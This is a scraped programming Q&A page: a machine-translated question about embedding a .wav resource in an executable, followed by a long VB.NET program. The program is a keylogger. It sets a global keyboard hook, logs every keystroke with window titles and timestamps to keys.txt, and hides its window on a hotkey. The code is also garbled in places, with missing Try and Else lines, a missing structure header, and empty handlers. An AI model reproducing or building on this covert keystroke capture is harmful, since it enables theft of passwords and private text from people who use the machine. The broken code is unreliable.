2011-11-18 32 views


SONG_NAME被認爲是指向正確的資源....我只是想能夠播放.wav而沒有他們的計算機上的.wav文件在指定的區域,因此讓它包含在.exe 。多謝你們!繼承人的代碼。

Public Class Form1 

#Region "API Functions And Structures" 'COLLAPSED CODE 

'Event types 
Private Const WM_KEYUP As Integer = &H101 
Private Const WM_KEYDOWN As Short = &H100S 
Private Const WM_SYSKEYDOWN As Integer = &H104 
Private Const WM_SYSKEYUP As Integer = &H105 

'Event Info structure 
    Public vkCode As Integer 'KeyCode (Of interest to us) 
    Public scanCode As Integer 'ScanCode 
    Public flags As Integer 
    Public time As Integer 
    Public dwExtraInfo As Integer 
End Structure 

Enum virtualKey 

    K_Return = &HD 
    K_Backspace = &H8 
    K_Space = &H20 
    K_Tab = &H9 
    K_Esc = &H1B 

    K_Control = &H11 
    K_LControl = &HA2 
    K_RControl = &HA3 

    K_Delete = &H2E 
    K_End = &H23 
    K_Home = &H24 
    K_Insert = &H2D 

    K_Shift = &H10 
    K_LShift = &HA0 
    K_RShift = &HA1 

    K_Pause = &H13 
    K_PrintScreen = 44 

    K_LWin = &H5B 
    K_RWin = &H5C 

    K_Alt = &H12 
    K_LAlt = &HA4 
    K_RAlt = &HA5 

    K_NumLock = &H90 
    K_CapsLock = &H14 

    K_Up = &H26 
    K_Down = &H28 
    K_Right = &H27 
    K_Left = &H25 

    K_F1 = &H70 
    K_F2 = &H71 
    K_F3 = &H72 
    K_F4 = &H73 
    K_F5 = &H74 
    K_F6 = &H75 
    K_F7 = &H76 
    K_F8 = &H77 
    K_F9 = &H78 
    K_F10 = &H79 
    K_F11 = &H7A 
    K_F12 = &H7B 
    K_F13 = &H7C 
    K_F14 = &H7D 
    K_F15 = &H7E 
    K_F16 = &H7F 
    K_F17 = &H80 
    K_F18 = &H81 
    K_F19 = &H82 
    K_F20 = &H83 
    K_F21 = &H84 
    K_F22 = &H85 
    K_F23 = &H86 
    K_F24 = &H87 

    K_Numpad0 = &H60 
    K_Numpad1 = &H61 
    K_Numpad2 = &H62 
    K_Numpad3 = &H63 
    K_Numpad4 = &H64 
    K_Numpad5 = &H65 
    K_Numpad6 = &H66 
    K_Numpad7 = &H67 
    K_Numpad8 = &H68 
    K_Numpad9 = &H69 
    'Math (numpad) 
    K_Num_Add = &H6B 
    K_Num_Divide = &H6F 
    K_Num_Multiply = &H6A 
    K_Num_Subtract = &H6D 
    K_Num_Decimal = &H6E 

    'Caracteres e Números 
    K_0 = &H30 
    K_1 = &H31 
    K_2 = &H32 
    K_3 = &H33 
    K_4 = &H34 
    K_5 = &H35 
    K_6 = &H36 
    K_7 = &H37 
    K_8 = &H38 
    K_9 = &H39 
    K_A = &H41 
    K_B = &H42 
    K_C = &H43 
    K_D = &H44 
    K_E = &H45 
    K_F = &H46 
    K_G = &H47 
    K_H = &H48 
    K_I = &H49 
    K_J = &H4A 
    K_K = &H4B 
    K_L = &H4C 
    K_M = &H4D 
    K_N = &H4E 
    K_O = &H4F 
    K_P = &H50 
    K_Q = &H51 
    K_R = &H52 
    K_S = &H53 
    K_T = &H54 
    K_U = &H55 
    K_V = &H56 
    K_W = &H57 
    K_X = &H58 
    K_Y = &H59 
    K_Z = &H5A 

    'Math (not numpad) 
    K_Subtract = 189 
    K_Decimal = 190 

End Enum 

'Keyboard hook related functions 
Private Declare Function UnhookWindowsHookEx Lib "user32" (ByVal hHook As Integer) As Integer 
Private Declare Function SetWindowsHookEx Lib "user32" Alias "SetWindowsHookExA" (ByVal idHook As Integer, ByVal lpfn As KeyboardHookDelegate, ByVal hmod As Integer, ByVal dwThreadId As Integer) As Integer 
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Integer) As Integer 
Private Declare Function CallNextHookEx Lib "user32" (ByVal hHook As Integer, ByVal nCode As Integer, ByVal wParam As Integer, ByVal lParam As KBDLLHOOKSTRUCT) As Integer 
Private Delegate Function KeyboardHookDelegate(ByVal Code As Integer, ByVal wParam As Integer, ByRef lParam As KBDLLHOOKSTRUCT) As Integer 

'Other API functions 
Private Declare Function GetForegroundWindow Lib "user32.dll"() As Int32 
Private Declare Function GetWindowText Lib "user32.dll" Alias "GetWindowTextA" (ByVal hwnd As Int32, ByVal lpString As String, ByVal cch As Int32) As Int32 
#End Region 

Private KeyboardHandle As IntPtr = 0 'Handle of the hook 
Private LastCheckedForegroundTitle As String = "" 'Title of the foreground window when last checked 
Private callback As KeyboardHookDelegate = Nothing 'Delegate for the hook 
Dim songOn As Integer = 1 

Dim FILE_NAME As String = CurDir() & "\keys.txt" 
Dim SONG_NAME As String = My.Resources.test1.ToString 
Private KeyLog As String 'Variable which holds the text to be appended to the text file 

''' Gets the title of the active window 
Private Function GetActiveWindowTitle() As String 
    Dim MyStr As String 
    MyStr = New String(Chr(0), 100) 
    GetWindowText(GetForegroundWindow, MyStr, 100) 
    MyStr = MyStr.Substring(0, InStr(MyStr, Chr(0)) - 1) 

    Return MyStr 
End Function 

''' Checks if we set a hook or not 
Private Function Hooked() 
    Return KeyboardHandle <> 0 'If KeyboardHandle = 0 it means that it isn't hooked so return false, otherwise return true 
End Function 

''' Sets the keyboard hook 
Public Sub HookKeyboard() 
    callback = New KeyboardHookDelegate(AddressOf KeyboardCallback) 
    KeyboardHandle = SetWindowsHookEx(13, callback, Process.GetCurrentProcess.MainModule.BaseAddress, 0) 
    If KeyboardHandle <> 0 Then 
     Me.btnStop.Enabled = True 
     Me.btnStart.Enabled = False 
     Label1.Text = "Active" 
     Label1.ForeColor = Color.DarkGreen 
    End If 
End Sub 

''' Unsets the keyboard hook 
Public Sub UnhookKeyboard() 
    If (Hooked()) Then 
     If UnhookWindowsHookEx(KeyboardHandle) <> 0 Then 
      Label1.Text = "Not Active" 
      Label1.ForeColor = Color.DarkRed 
      Me.btnStop.Enabled = False 
      Me.btnStart.Enabled = True 
      KeyboardHandle = 0 'We have unhooked successfully 
     End If 
    End If 
End Sub 

''' Function to be called when there's a keyboard event 
Public Function KeyboardCallback(ByVal Code As Integer, ByVal wParam As Integer, ByRef lParam As KBDLLHOOKSTRUCT) As Integer 

    'Get current foreground window title 
    Dim CurrentTitle = GetActiveWindowTitle() 

    'If title of the foreground window changed 
    If CurrentTitle <> LastCheckedForegroundTitle Then 
     LastCheckedForegroundTitle = CurrentTitle 
     'Add a little header containing the application title and date 
     KeyLog &= vbCrLf & "----------- " & CurrentTitle & " (" & Now.ToString() & ") ------------" & vbCrLf 
    End If 

    'Variable to hold the text describing the key pressed 
    Dim Key As String = "" 

    'If event is KEYDOWN 
    If wParam = WM_KEYDOWN Or wParam = WM_SYSKEYDOWN Then 

     'If we can block events 
     If Code >= 0 Then 
      'If Ctrl+Alt+S 
      If My.Computer.Keyboard.CtrlKeyDown And My.Computer.Keyboard.AltKeyDown And lParam.vkCode = virtualKey.K_S Then 
       Me.Visible = Not Me.Visible 'Hide/Show form 
       Return 1 'Block event 
      End If 
     End If 

     'Translate virtual key into character/expression 
     Select Case lParam.vkCode 
      Case virtualKey.K_1 
       If My.Computer.Keyboard.ShiftKeyDown Then 
        Key = "!" 
        Key = ChrW(lParam.vkCode) 
       End If 
      Case virtualKey.K_2 
       If My.Computer.Keyboard.ShiftKeyDown Then 
        Key = "@" 
        Key = ChrW(lParam.vkCode) 
       End If 
      Case virtualKey.K_3 
       If My.Computer.Keyboard.ShiftKeyDown Then 
        Key = "#" 
        Key = ChrW(lParam.vkCode) 
       End If 
      Case virtualKey.K_4 
       If My.Computer.Keyboard.ShiftKeyDown Then 
        Key = "$" 
        Key = ChrW(lParam.vkCode) 
       End If 
      Case virtualKey.K_5 
       If My.Computer.Keyboard.ShiftKeyDown Then 
        Key = "%" 
        Key = ChrW(lParam.vkCode) 
       End If 
      Case virtualKey.K_6 
       If My.Computer.Keyboard.ShiftKeyDown Then 
        Key = "^" 
        Key = ChrW(lParam.vkCode) 
       End If 
      Case virtualKey.K_7 
       If My.Computer.Keyboard.ShiftKeyDown Then 
        Key = "&" 
        Key = ChrW(lParam.vkCode) 
       End If 
      Case virtualKey.K_8 
       If My.Computer.Keyboard.ShiftKeyDown Then 
        Key = "*" 
        Key = ChrW(lParam.vkCode) 
       End If 
      Case virtualKey.K_9 
       If My.Computer.Keyboard.ShiftKeyDown Then 
        Key = "(" 
        Key = ChrW(lParam.vkCode) 
       End If 
      Case virtualKey.K_0 
       If My.Computer.Keyboard.ShiftKeyDown Then 
        Key = ")" 
        Key = ChrW(lParam.vkCode) 
       End If 
      Case virtualKey.K_0 To virtualKey.K_9 
       Key = ChrW(lParam.vkCode) 
      Case virtualKey.K_A To virtualKey.K_Z 
       Key = ChrW(lParam.vkCode + 32) 
      Case virtualKey.K_Space 
       Key = " " 
      Case virtualKey.K_RControl, virtualKey.K_LControl 
       Key = "[control]" 
      Case virtualKey.K_LAlt 
       Key = "[alt]" 
      Case virtualKey.K_RAlt 
       Key = "[alt gr]" 
      Case virtualKey.K_LShift, virtualKey.K_RShift 
       Key = "" 
      Case virtualKey.K_Return 
       Key = vbCrLf 
      Case virtualKey.K_Tab 
       Key = vbTab 
      Case virtualKey.K_Delete 
       Key = "[delete]" 
      Case virtualKey.K_Esc 
       Key = "[esc]" 
      Case virtualKey.K_CapsLock 
       If My.Computer.Keyboard.CapsLock Then 
        Key = "[/caps]" 
        Key = "[caps]" 
       End If 
      Case virtualKey.K_F1 To virtualKey.K_F24 
       Key = "[F" & (lParam.vkCode - 111) & "]" 
      Case virtualKey.K_Right 
       Key = "[Right Arrow]" 
      Case virtualKey.K_Down 
       Key = "[Down Arrow]" 
      Case virtualKey.K_Left 
       Key = "[Left Arrow]" 
      Case virtualKey.K_Up 
       Key = "[Up Arrow]" 
      Case virtualKey.K_Backspace 
       Key = "[bkspace]" 
      Case virtualKey.K_Decimal, virtualKey.K_Num_Decimal 
       Key = "." 
      Case virtualKey.K_Subtract, virtualKey.K_Num_Subtract 
       Key = "-" 
      Case Else 
       Key = lParam.vkCode 'If we didn't treat it, show the virtual key code (integer) so that we know what Case to add 
     End Select 

    'If event is Key UP 
    ElseIf wParam = WM_KEYUP Or wParam = WM_SYSKEYUP Then 
     Select Case lParam.vkCode 
      Case virtualKey.K_RControl, virtualKey.K_LControl 
       Key = "[/control]" 
      Case virtualKey.K_LAlt 
       Key = "[/alt]" 
      Case virtualKey.K_RAlt 
       Key = "[/alt gr]" 
      Case virtualKey.K_LShift, virtualKey.K_RShift 
       Key = "" 
     End Select 

    End If 

    If My.Computer.Keyboard.ShiftKeyDown OrElse My.Computer.Keyboard.CapsLock Then 
     Key = Key.ToUpper 
    End If 

    'Add it to the log 
    KeyLog &= Key 

    If Key <> "" Then 
     Me.ListBox1.Items.Add(Key) 'Add it to the listbox for debugging purposes 
    End If 
    Return CallNextHookEx(KeyboardHandle, Code, wParam, lParam) 'Let event go to the other applications 

End Function 

''' On tick 
Private Sub Timer1_Tick(ByVal sender As Object, ByVal e As System.EventArgs) Handles Timer1.Tick 

     My.Computer.FileSystem.WriteAllText(CurDir() & "\keys.txt", KeyLog, True) 
     KeyLog = "" 
    Catch ex As Exception 
    End Try 

    If ListBox1.Items.Count > 1 Then 
     ListBox1.SelectedItem = ListBox1.Items.Item(ListBox1.Items.Count - 1) 
    End If 
End Sub 

''' On Form Exit 
Private Sub Form1_FormClosing(ByVal sender As Object, ByVal e As System.Windows.Forms.FormClosingEventArgs) Handles Me.FormClosing 

    My.Computer.FileSystem.WriteAllText(CurDir() & "\keys.txt", KeyLog, True) 

End Sub 

''' Start Hook 
Private Sub btnStart_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnStart.Click 


End Sub 

''' Stop the hook 
Private Sub btnStop_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnStop.Click 


End Sub 

''' Exit Program 
Private Sub btnExit_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnExit.Click 


End Sub 

Private Sub btnHide_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnHide.Click 
    If Label1.Text = "Active" Then 
     Me.Visible = Not Me.Visible 'Hide/Show form 
    End If 

End Sub 

Private Sub btnOpenLog_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnOpenLog.Click 

    System.Diagnostics.Process.Start("notepad.exe", FILE_NAME) 
End Sub 

Private Sub btnClearLog_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnClearLog.Click 
    If MessageBox.Show("This will clear the log. Continue?", "Confirm Clearing", MessageBoxButtons.YesNo) = Windows.Forms.DialogResult.Yes Then 
     System.IO.File.WriteAllText(FILE_NAME, "") 

    End If 

End Sub 
Private PlaySound As New System.Media.SoundPlayer 

Public Sub PlaySoundFile(ByVal SoundPath As String) 
    PlaySound.SoundLocation = SoundPath 
End Sub 

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load 

    Me.Left = (Screen.PrimaryScreen.WorkingArea.Width - Me.Width)/2 
    Me.Top = (Screen.PrimaryScreen.WorkingArea.Height - Me.Height)/2 
End Sub 

Private Sub pbMask_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles pbMask.Click 

    If songOn = 1 Then 

     songOn = 2 
    ElseIf songOn = 2 Then 

     songOn = 1 
    End If 
End Sub 
End Class 
